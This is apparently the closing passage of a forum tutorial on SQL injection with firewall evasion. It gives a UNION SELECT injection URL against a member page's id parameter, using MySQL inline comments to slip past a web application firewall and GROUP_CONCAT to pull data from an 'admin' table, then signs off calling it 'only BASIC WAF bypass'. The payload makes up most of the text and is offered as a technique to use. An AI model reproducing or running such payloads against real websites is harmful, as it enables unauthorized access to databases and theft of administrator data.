http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25​,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,5​2,53,54,55,56,57,58,59,60,61,62 from admin--

Hope you learned something from my tutorial, feel free to ask if you have any questions.

REMEMBER; This is only BASIC WAF bypass, the techniques are endless